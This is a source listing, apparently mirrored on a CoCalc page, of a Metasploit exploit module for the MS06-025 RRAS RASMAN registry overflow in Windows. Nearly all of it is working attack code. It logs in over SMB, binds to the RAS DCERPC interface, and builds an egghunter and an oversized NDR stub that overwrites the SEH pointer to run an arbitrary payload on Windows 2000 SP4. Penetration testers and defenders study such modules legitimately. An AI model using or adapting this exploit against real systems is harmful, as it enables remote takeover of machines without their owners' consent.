CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::Remote::Egghunter
10
include Msf::Exploit::Remote::DCERPC
11
include Msf::Exploit::Remote::SMB::Client
12
13
def initialize(info = {})
14
super(update_info(info,
15
'Name' => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',
16
'Description' => %q{
17
This module exploits a registry-based stack buffer overflow in the Windows Routing
18
and Remote Access Service. Since the service is hosted inside svchost.exe,
19
a failed exploit attempt can cause other system services to fail as well.
20
A valid username and password is required to exploit this flaw on Windows 2000.
21
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
22
Exploiting this flaw involves two distinct steps - creating the registry key
23
and then triggering an overwrite based on a read of this key. Once the key is
24
created, it cannot be recreated. This means that for any given system, you
25
only get one chance to exploit this flaw. Picking the wrong target will require
26
a manual removal of the following registry key before you can try again:
27
HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
28
},
29
'Author' => [ 'pusscat', 'hdm' ],
30
'License' => BSD_LICENSE,
31
'References' =>
32
[
33
[ 'CVE', '2006-2370' ],
34
[ 'OSVDB', '26437' ],
35
[ 'BID', '18325' ],
36
[ 'MSB', 'MS06-025' ]
37
],
38
'Privileged' => true,
39
'DefaultOptions' =>
40
{
41
'EXITFUNC' => 'thread'
42
},
43
'Payload' =>
44
{
45
'Space' => 512,
46
'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
47
'StackAdjustment' => -3500,
48
},
49
'Platform' => 'win',
50
'Targets' =>
51
[
52
[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
53
],
54
'DefaultTarget' => 0,
55
'DisclosureDate' => '2006-06-13'))
56
57
register_options(
58
[
59
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
60
])
61
end
62
63
# Post authentication bugs are rarely useful during automation
64
def autofilter
65
false
66
end
67
68
def exploit
69
connect()
70
smb_login()
71
print_status("Trying target #{target.name}...")
72
73
# Generate the egghunter payload
74
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
75
egg = hunter[1]
76
77
# Pick a "filler" character that we know doesn't get mangled
78
# by the wide string conversion routines
79
filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
80
fil = filset[ rand(filset.length) ].chr
81
82
# Bind to the actual DCERPC interface
83
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
84
print_status("Binding to #{handle}")
85
dcerpc_bind(handle)
86
print_status("Bound to #{handle}")
87
88
# Add giant blocks of guard data before and after the egg
89
eggdata =
90
fil * 1024 +
91
egg +
92
fil * 1024
93
94
# Place the egghunter where ESI happens to point
95
bof = (fil * 178)
96
bof[84, hunter[0].length] = hunter[0]
97
98
# Overwrite the SEH ptr, even though ESP is smashed
99
# The handle after the ret must be an invalid address
100
pat =
101
(fil * 886) +
102
NDR.long(target.ret) +
103
(fil * 3) + "\xc0" +
104
bof
105
106
type2 =
107
NDR.string( (fil * 1024) + "\x00" ) +
108
NDR.string( pat + "\x00" ) +
109
NDR.string( (fil * 4096) + "\x00" ) +
110
NDR.long(rand(0xffffffff)) +
111
NDR.long(rand(0xffffffff))
112
113
type1 =
114
NDR.long(rand(0xffffffff)) + # OperatorDial
115
NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
116
NDR.long(rand(0xffffffff)) + # UseLocation
117
NDR.long(rand(0xffffffff)) + # ShowLights
118
NDR.long(rand(0xffffffff)) + # ShowConnectStatus
119
NDR.long(rand(0xffffffff)) + # CloseOnDial
120
NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
121
NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
122
NDR.long(rand(0xffffffff)) + # SkipConnectComplete
123
NDR.long(rand(0xffffffff)) + # NewEntryWizard
124
NDR.long(rand(0xffffffff)) + # RedialAttempts
125
NDR.long(rand(0xffffffff)) + # RedialSeconds
126
NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
127
NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
128
NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
129
NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
130
NDR.long(rand(0xffffffff)) + # CallbackMode
131
132
NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
133
NDR.wstring("\x00" * 129) +
134
NDR.long(rand(0xffffffff)) +
135
NDR.wstring("\x00" * 520) +
136
NDR.wstring("\x00" * 520) +
137
138
NDR.long(rand(0xffffffff)) +
139
NDR.long(rand(0xffffffff)) +
140
NDR.long(rand(0xffffffff)) +
141
NDR.long(rand(0xffffffff)) +
142
NDR.long(rand(0xffffffff)) +
143
NDR.long(rand(0xffffffff)) +
144
NDR.long(rand(0xffffffff)) +
145
NDR.long(rand(0xffffffff)) +
146
147
NDR.string("\x00" * 514) +
148
149
NDR.long(rand(0xffffffff)) +
150
NDR.long(rand(0xffffffff))
151
152
stubdata =
153
type1 +
154
NDR.long(rand(0xffffffff)) +
155
eggdata
156
157
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
158
159
begin
160
print_status('Creating the malicious registry key...')
161
response = dcerpc.call(0xA, stubdata)
162
163
print_status('Attempting to trigger the base pointer overwrite...')
164
response = dcerpc.call(0xA, stubdata)
165
166
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
167
end
168
169
handler
170
disconnect
171
end
172
end
173
174